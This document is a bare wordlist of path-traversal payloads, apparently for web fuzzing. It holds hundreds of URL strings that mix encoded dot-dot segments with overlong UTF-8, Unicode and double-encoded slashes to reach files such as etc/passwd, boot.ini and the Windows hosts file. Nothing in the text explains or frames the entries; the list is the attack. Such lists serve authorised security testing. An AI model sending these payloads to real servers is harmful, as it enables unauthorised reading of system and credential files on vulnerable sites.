-%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8sboot.ini -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8sissue -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8sboot.ini -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8sissue -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8sboot.ini -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1cboot.ini -%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%1c%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1c%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1c%2e.%c1%1cboot.ini -%2e.%c1%1c%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cboot.ini -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cboot.ini -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cboot.ini -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cpasswd -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cetc%c1%1cissue -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cboot.ini -%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1c%2e.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e.%c1%afetc%c1%afpasswd -%2e.%c1%afetc%c1%afissue -%2e.%c1%afboot.ini -%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%c1%af%2e.%c1%afetc%c1%afpasswd -%2e.%c1%af%2e.%c1%afetc%c1%afissue -%2e.%c1%af%2e.%c1%afboot.ini -%2e.%c1%af%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afpasswd -%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afissue -%2e.%c1%af%2e.%c1%af%2e.%c1%afboot.ini -%2e.%c1%af%2e.%c1%af%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afpasswd -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afissue -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afboot.ini -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afpasswd -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afissue -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afboot.ini -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afpasswd -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afetc%c1%afissue -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afboot.ini -%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%af%2e.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qfboot.ini -%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%bg%qf%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qf%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qf%2e.%bg%qfboot.ini -%2e.%bg%qf%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfboot.ini -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfboot.ini -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfboot.ini -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfpasswd -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfetc%bg%qfissue -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfboot.ini -%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qf%2e.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e.%u2215etc%u2215passwd -%2e.%u2215etc%u2215issue -%2e.%u2215boot.ini -%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2215%2e.%u2215etc%u2215passwd -%2e.%u2215%2e.%u2215etc%u2215issue -%2e.%u2215%2e.%u2215boot.ini -%2e.%u2215%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215passwd -%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215issue -%2e.%u2215%2e.%u2215%2e.%u2215boot.ini -%2e.%u2215%2e.%u2215%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215passwd -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215issue -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215boot.ini -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215passwd -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215issue -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215boot.ini -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215passwd -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215etc%u2215issue -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215boot.ini -%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215%2e.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e.%u2216etc%u2216passwd -%2e.%u2216etc%u2216issue -%2e.%u2216boot.ini -%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%u2216%2e.%u2216etc%u2216passwd -%2e.%u2216%2e.%u2216etc%u2216issue -%2e.%u2216%2e.%u2216boot.ini -%2e.%u2216%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216passwd -%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216issue -%2e.%u2216%2e.%u2216%2e.%u2216boot.ini -%2e.%u2216%2e.%u2216%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216passwd -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216issue -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216boot.ini -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216passwd -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216issue -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216boot.ini -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216passwd -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216etc%u2216issue -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216boot.ini -%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216%2e.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8boot.ini -%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uEFC8%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8%2e.%uEFC8boot.ini -%2e.%uEFC8%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8boot.ini -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8boot.ini -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8boot.ini -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8passwd -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8etc%uEFC8issue -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8boot.ini -%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8%2e.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e.%uF025etc%uF025passwd -%2e.%uF025etc%uF025issue -%2e.%uF025boot.ini -%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%uF025%2e.%uF025etc%uF025passwd -%2e.%uF025%2e.%uF025etc%uF025issue -%2e.%uF025%2e.%uF025boot.ini -%2e.%uF025%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025passwd -%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025issue -%2e.%uF025%2e.%uF025%2e.%uF025boot.ini -%2e.%uF025%2e.%uF025%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025passwd -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025issue -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025boot.ini -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025passwd -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025issue -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025boot.ini -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025passwd -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025etc%uF025issue -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025boot.ini -%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025%2e.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66boot.ini -%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%32%%66%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66%2e.%%32%%66boot.ini -%2e.%%32%%66%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66boot.ini -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66boot.ini -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66boot.ini -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66passwd -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66etc%%32%%66issue -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66boot.ini -%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66%2e.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63boot.ini -%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%%35%%63%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63%2e.%%35%%63boot.ini -%2e.%%35%%63%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63boot.ini -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63boot.ini -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63boot.ini -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63passwd -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63etc%%35%%63issue -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63boot.ini -%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63%2e.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%afboot.ini -%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%af%2e.%e0%80%afboot.ini -%2e.%e0%80%af%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afboot.ini -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afboot.ini -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afboot.ini -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afissue -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afboot.ini -%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%af%2e.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259cboot.ini -%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259c%2e.%25c1%259cboot.ini -%2e.%25c1%259c%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cboot.ini -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cboot.ini -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cboot.ini -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cpasswd -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cetc%25c1%259cissue -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cboot.ini -%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259c%2e.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e.%25c0%25afetc%25c0%25afpasswd -%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25afboot.ini -%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd -%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25af%2e.%25c0%25afboot.ini -%2e.%25c0%25af%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afboot.ini -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afboot.ini -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afboot.ini -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afpasswd 